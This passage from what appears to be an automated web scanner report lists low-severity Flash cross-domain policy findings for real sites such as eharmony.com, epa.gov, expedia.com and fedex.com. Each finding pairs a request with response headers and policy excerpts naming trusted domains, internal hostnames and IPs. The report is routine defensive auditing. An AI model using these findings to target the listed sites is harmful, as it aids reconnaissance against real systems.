<allow-access-from domain="m.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="betadfa.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="motifcdn2.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m1.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="cdn.edmunds.com*"/>
<allow-access-from domain="216.133.230.222"/>
<allow-access-from domain="216.133.230.225"/>
<allow-access-from domain="216.133.230.226"/>
<allow-access-from domain="216.133.230.227"/>
<allow-access-from domain="216.133.230.228"/>
<allow-access-from domain="216.133.230.229"/>
<allow-access-from domain="216.133.230.230"/>
<allow-access-from domain="216.133.230.231"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...
<allow-access-from domain="*.local"/>
<allow-access-from domain="*.localhost"/>
...[SNIP]...

7.241. http://www.eharmony.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eharmony.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eharmony.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:39 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Wed, 04 Aug 2010 23:07:16 GMT
ETag: "42f-48d077ea6f100"
Accept-Ranges: bytes
Content-Length: 1071
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 13:53:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml
Set-Cookie: BIGipServerFront=3893301676.16671.0000; path=/
Set-Cookie: lbid=9d2a2466-11db-45be-62f2-cd84cad89a73;expires=Thu, 29-Sep-2011 13:38:39 GMT;path=/;domain=.eharmony.com;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow
...[SNIP]...
<allow-access-from domain="static.eharmony.com" />
   <allow-access-from domain="*.eharmony.com" />
   <allow-access-from domain="*.eharmony.ca" />
   <allow-access-from domain="*.eharmony.com.au" />
   <allow-access-from domain="*.eharmony.co.uk" />
   <allow-access-from domain="*.eharmony.com.br" />
   <allow-access-from domain="*.compatiblepartners.net" />
...[SNIP]...

7.242. http://www.elle.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.elle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.elle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) DAV/2 PHP/5.2.12 SVN/1.5.5
Last-Modified: Tue, 15 Mar 2011 04:36:57 GMT
ETag: "76ac0-db-49e7dfa764c40"
Accept-Ranges: bytes
Content-Length: 219
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:06:45 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*.hfmus.com" />
<allow-access-from domain="hfm.checkm8.com" />
<allow-access-from domain="*.elle.com" />
</cro
...[SNIP]...

7.243. http://www.emedtv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.emedtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.emedtv.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: UT1=173.193.214.243.1301751595318080; path=/; expires=Tue, 30-Mar-21 13:39:55 GMT; domain=.emedtv.com
ETag: W/"213-1277746037000"
Last-Modified: Mon, 28 Jun 2010 17:27:17 GMT
Content-Length: 213
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.emedtv.com" />
</cross-d
...[SNIP]...

7.244. http://www.engadget.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.engadget.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.engadget.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:33 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 318
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

7.245. http://www.entertonement.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.entertonement.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.entertonement.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:54 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 07 Dec 2010 22:38:10 GMT
Accept-Ranges: bytes
Content-Length: 367
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.entertonement.com"/>
<allow-access-from domain="*.etmnt.com"/>
<allow-access-from domain="*.chir.ps"/>
...[SNIP]...

7.246. http://www.eonline.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eonline.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.2 (Unix) mod_jk/1.2.20 PHP/5.2.4
Accept-Ranges: bytes
Content-Length: 1462
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:43:46 GMT
Connection: close
Set-Cookie: edition=us; expires=Sun, 03-Apr-2011 13:43:46 GMT; path=/; domain=.eonline.com
Set-Cookie: adEdition=us; expires=Sun, 03-Apr-2011 13:43:46 GMT; path=/; domain=.eonline.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.72andsunny.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.att.net" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.casylum.com"/>
<allow-access-from domain="*.clearchannel.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.clearspring.com" />
<allow-access-from domain="*.creativeasylumdev.com" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.dvlabs.com" />
<allow-access-from domain="*.eentertainment.com"/>
<allow-access-from domain="*.eonline.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.klipmart.com" />
<allow-access-from domain="*.klipmart.com.edgesuite.net" />
<allow-access-from domain="*.kliptracker.com" />
<allow-access-from domain="*.kmshowcase.com" />
<allow-access-from domain="*.movenetworks.com" />
<allow-access-from domain="*.mystyle.com" />
<allow-access-from domain="*.oosocial.net" />
<allow-access-from domain="*.stylenetwork.com" />
<allow-access-from domain="*.wordpress.comcastnets.net" />
<allow-access-from domain="*.xlontech.net"/>
<allow-access-from domain="*.zugara.com" />
...[SNIP]...

7.247. http://www.epa.gov/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.epa.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.epa.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:52 GMT
Server: Apache
Last-Modified: Tue, 13 Jul 2010 15:52:00 GMT
ETag: "51b9349-115-48b46d9822800"
Accept-Ranges: bytes
Content-Length: 277
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rtpnc.epa.gov"/>
<allow-access-from domain="*.epa.gov"/>
...[SNIP]...

7.248. http://www.etsy.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.etsy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.etsy.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 27 Oct 2010 18:34:53 GMT
Accept-Ranges: bytes
Content-Length: 352
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:31:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="etsy.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.etsy.com" secure="false"/>
...[SNIP]...

7.249. http://www.evite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.evite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.evite.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 10 Sep 2009 01:53:50 GMT
ETag: "4e1c62-102-4732f789129a8"-gzip
Content-Type: application/xml
Vary: User-Agent
Expires: Sat, 02 Apr 2011 12:43:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:43:20 GMT
Content-Length: 258
Connection: close
Set-Cookie: evsessionid=66.235.125.15.1301748200664549; path=/; domain=.evite.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.evite.com"/>
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...

7.250. http://www.expedia.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.expedia.com

Response

HTTP/1.0 200 OK
Content-Length: 1950
Content-Type: text/xml
Last-Modified: Tue, 27 Apr 2010 20:20:24 GMT
Accept-Ranges: bytes
ETag: "0b4401147e6ca1:0"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Date: Sat, 02 Apr 2011 13:23:12 GMT
Connection: close

...<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy>
<cross-domain-policy>
<allow-access-from domain="*.expedia.ca" secure="true" />
<allow-access-from domain="*.expedia.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="content.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ads.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="media.expedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.com.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.de" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.it" secure="true" />
...[SNIP]...
<allow-access-from domain="*.expedia.nl" secure="true" />
...[SNIP]...
<allow-access-from domain=" www.expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*expediacorporate.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.hotels.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.hotwire.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.tripadvisor.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte1.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte4.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte5.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wwte7.com" secure="true" />
...[SNIP]...
<allow-access-from domain="labadssrv01" secure="true" />
...[SNIP]...
<allow-access-from domain="labadsol01" secure="true" />
...[SNIP]...
<allow-access-from domain="10.95.1.5" secure="true" />
...[SNIP]...
<allow-access-from domain="belwaweb01" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="true" />
...[SNIP]...

7.251. http://www.factmonster.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.factmonster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.factmonster.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:25 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301753785065171; path=/; expires=Sun, 01-Apr-12 14:16:25 GMT
Last-Modified: Thu, 28 Oct 2010 21:07:40 GMT
ETag: "1cd-493b3bb70bf00"
Accept-Ranges: bytes
Content-Length: 461
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 14:16:25 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.infoplease.com" />
<allow-access-from domain="infoplease.info" />
<allow-access-from domain="*.infoplease.info" />
<allow-access-from domain="i.infopls.com" />
<allow-access-from domain="*.familyeducation.com" />
...[SNIP]...

7.252. http://www.familyeducation.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.familyeducation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.familyeducation.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:56:22 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Mon, 23 Aug 2004 15:52:19 GMT
ETag: "f06edb2b2989c41:941"
Content-Length: 562

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="fen.com" />
<allow-access-from domain="*.fen.com" />
<allow-access-from domain="familyeducation.com" />
<allow-access-from domain="*.familyeducation.com" />
<allow-access-from domain="fekids.com" />
<allow-access-from domain="*.fekids.com" />
<allow-access-from domain="funbrain.com" />
<allow-access-from domain="*.funbrain.com" />
...[SNIP]...

7.253. http://www.famousfootwear.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.famousfootwear.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.famousfootwear.com

Response

HTTP/1.0 200 OK
Content-Length: 389
Content-Type: text/xml
Last-Modified: Fri, 12 Jun 2009 13:50:37 GMT
Accept-Ranges: bytes
ETag: "b9b92bc464ebc91:809f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:16:34 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.interfacecms.com" />
   <allow-access-from domain="*.famousfootwear.com" />
...[SNIP]...

7.254. http://www.fandango.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fandango.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fandango.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 1464
Content-Type: text/xml
Last-Modified: Tue, 28 Sep 2010 15:46:00 GMT
Accept-Ranges: bytes
ETag: "02c8f3f245fcb1:1e98"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa STP BUS UNI COM NAV INT CNT STA"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:51 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<site-control per
...[SNIP]...
<allow-access-from domain="comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcastonline.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.att.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.pointroll.com"/>
<allow-access-from domain="www.pointroll.com"/>
<allow-access-from domain="submit.pointroll.com"/>
<allow-access-from domain="data.pointroll.com"/>
<allow-access-from domain="speed.pointroll.com"/>
<allow-access-from domain="mirror.pointroll.com"/>
<allow-access-from domain="mx.pointroll.com"/>
<allow-access-from domain="geo.pointroll.com"/>
<allow-access-from domain="ll.pointroll.com"/>
<allow-access-from domain="demo.pointroll.net"/>
<allow-access-from domain="clk.pointroll.com"/>
<allow-access-from domain="clients.pointroll.com"/>
<allow-access-from domain="images.fandango.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a248.e.akamai.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="cdn1.eyewonder.com"/>
<allow-access-from domain="cdn.eyewonder.com"/>
...[SNIP]...

7.255. http://www.fanfiction.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fanfiction.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fanfiction.net

Response

HTTP/1.0 200 OK
Server: LiteSpeed
Date: Sat, 02 Apr 2011 13:42:29 GMT
Connection: close
Accept-Ranges: bytes
ETag: "111-4d13ae92-0"
Last-Modified: Thu, 23 Dec 2010 20:18:26 GMT
Content-Type: application/xml
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:42:20 GMT
Content-Length: 273

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*.fanfiction.net" />
...[SNIP]...

7.256. http://www.fanpop.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fanpop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fanpop.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:32:52 GMT
Content-Type: text/xml
Content-Length: 212
Last-Modified: Mon, 08 Nov 2010 23:28:28 GMT
Connection: close
Expires: Sat, 02 Apr 2011 13:32:53 GMT
Cache-Control: max-age=1
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.meebo.com" />
</cross-dom
...[SNIP]...

7.257. http://www.fantage.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fantage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fantage.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:52 GMT
Server: Apache
Last-Modified: Tue, 05 Oct 2010 23:53:59 GMT
ETag: "a7051b-147-491e75fe293c0"
Accept-Ranges: bytes
Content-Length: 327
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.fantage.com" />
<allow-access-from domain="fantage-1" />
<allow-access-from domain="fantage-2" />
...[SNIP]...

7.258. http://www.fastcompany.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fastcompany.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:53 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.4
X-Drupal-Cache: MISS
Expires: Sat, 02 Apr 2011 14:15:05 GMT
Last-Modified: Sat, 02 Apr 2011 13:55:05 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1301752505"
Content-Length: 273
Vary: Accept-Encoding
X-Served-By: daa-www010
Content-Type: text/xml
X-Cache: MISS from VoxCAST
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.fastcompany.com" />
<allow-access-from domain="*.www.fastcompany.com" />
...[SNIP]...

7.259. http://www.fedex.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fedex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fedex.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:24:33 GMT
Content-length: 543
Content-type: text/xml
X-ua-compatible: IE=EmulateIE7
Set-cookie: fdx_cbid=22185494081301750673092930271330; expires=Monday, 18-January-2038 21:14:07 GMT; path=/; domain=.fedex.com
Last-modified: Fri, 29 Jan 2010 15:21:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.fedex.com"/>
...[SNIP]...
<allow-access-from domain="*http://www.myexperiencephoto.com"/>
...[SNIP]...

7.260. http://www.fidelity.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fidelity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
